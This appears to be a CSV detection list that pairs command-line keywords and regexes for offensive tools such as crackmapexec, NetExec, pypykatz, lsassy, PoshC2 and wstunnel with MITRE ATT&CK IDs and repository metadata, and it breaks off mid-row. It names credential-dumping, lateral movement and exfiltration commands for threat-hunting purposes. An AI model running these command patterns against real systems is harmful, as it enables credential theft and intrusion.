"* local secrets -m disk*",".{0,1000}\slocal\ssecrets\s\-m\sdisk.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* local secrets -m wmi*",".{0,1000}\slocal\ssecrets\s\-m\swmi.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* local_execution_linux.exe*",".{0,1000}\slocal_execution_linux\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* local_map.exe*",".{0,1000}\slocal_map\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation 
tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* local_thread_hijacking.exe*",".{0,1000}\slocal_thread_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* LocalAdminAccess.txt*",".{0,1000}\sLocalAdminAccess\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "* --local-auth --shares*",".{0,1000}\s\-\-local\-auth\s\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* localbrute.ps1*",".{0,1000}\slocalbrute\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* -LocalPoshC2ProjectDir *",".{0,1000}\s\-LocalPoshC2ProjectDir\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* -LocalPoshC2ProjectDir *",".{0,1000}\s\-LocalPoshC2ProjectDir\s.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* LocalShellExtParse.py*",".{0,1000}\sLocalShellExtParse\.py.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. 
Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "* --local-to-remote socks5://*",".{0,1000}\s\-\-local\-to\-remote\ssocks5\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* --local-to-remote stdio://*",".{0,1000}\s\-\-local\-to\-remote\sstdio\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* --local-to-remote tcp://*",".{0,1000}\s\-\-local\-to\-remote\stcp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* --local-to-remote tproxy+tcp://*",".{0,1000}\s\-\-local\-to\-remote\stproxy\+tcp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* 
--local-to-remote tproxy+udp://*",".{0,1000}\s\-\-local\-to\-remote\stproxy\+udp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* --local-to-remote udp://*",".{0,1000}\s\-\-local\-to\-remote\sudp\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "* -lockless -Command *",".{0,1000}\s\-lockless\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* --loggedon-users*",".{0,1000}\s\-\-loggedon\-users.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* loginAAD.ps1*",".{0,1000}\sloginAAD\.ps1.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* looneypwner.sh*",".{0,1000}\slooneypwner\.sh.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","0","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "* --lport 1337 *",".{0,1000}\s\-\-lport\s1337\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* LPORT=4444*",".{0,1000}\sLPORT\=4444.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 
- T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "* lsa minidump * -o *",".{0,1000}\slsa\sminidump\s.{0,1000}\s\-o\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* lsa minidump *.dmp*",".{0,1000}\slsa\sminidump\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* lsa minidump *.dmp*",".{0,1000}\slsa\sminidump\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* lsa minidump /*",".{0,1000}\slsa\sminidump\s\/.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* lsass.dmp*",".{0,1000}\slsass\.dmp.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","N/A","Credential 
Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* lsass_creds.txt*",".{0,1000}\slsass_creds\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* lsassy -k -d *",".{0,1000}\slsassy\s\-k\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* lsassy*",".{0,1000}\slsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "* lu-enum.nse*",".{0,1000}\slu\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* LyncSniper.ps1*",".{0,1000}\/LyncSniper\.ps1.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "* -M dfscoerce *",".{0,1000}\s\-M\sdfscoerce\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M empire_exec -o LISTENER=http-listener*",".{0,1000}\s\-M\sempire_exec\s\-o\sLISTENER\=http\-listener.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -m enrichment.cli.submit_to_nemesis*",".{0,1000}\s\-m\senrichment\.cli\.submit_to_nemesis.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - 
TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* -M gpp_autologin*",".{0,1000}\s\-M\sgpp_autologin.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M handlekatz *",".{0,1000}\s\-M\shandlekatz\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M keepass_discover *",".{0,1000}\s\-M\skeepass_discover\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M keepass_discover*",".{0,1000}\s\-M\skeepass_discover.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M keepass_trigger -o ACTION=ALL USER=*",".{0,1000}\s\-M\skeepass_trigger\s\-o\sACTION\=ALL\sUSER\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -m lagentcmd *powershell *",".{0,1000}\s\-m\slagentcmd\s.{0,1000}powershell\s.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","569","107","2024-04-22T20:02:18Z","2021-11-19T15:58:49Z" "* -M laps --kdcHost *",".{0,1000}\s\-M\slaps\s\-\-kdcHost\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M ldap-checker *",".{0,1000}\s\-M\sldap\-checker\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M ldap-checker *",".{0,1000}\s\-M\sldap\-checker\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M lsassy *",".{0,1000}\s\-M\slsassy\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M MAQ --kdcHost *",".{0,1000}\s\-M\sMAQ\s\-\-kdcHost\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M masky *CA=*",".{0,1000}\s\-M\smasky\s.{0,1000}CA\=.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M ms17-010 *",".{0,1000}\s\-M\sms17\-010\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M mssql_priv *",".{0,1000}\s\-M\smssql_priv\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M multirdp*",".{0,1000}\s\-M\smultirdp.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -M nanodump *",".{0,1000}\s\-M\snanodump\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -m olecmd -o *powershell *",".{0,1000}\s\-m\solecmd\s\-o\s.{0,1000}powershell\s.{0,1000}","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","569","107","2024-04-22T20:02:18Z","2021-11-19T15:58:49Z" "* -M pe_inject*",".{0,1000}\s\-M\spe_inject.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* -M petitpotam *",".{0,1000}\s\-M\spetitpotam\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -M petitpotam*",".{0,1000}\s\-M\spetitpotam.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* -M printnightmare *",".{0,1000}\s\-M\sprintnightmare\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -m privileged-users --full 
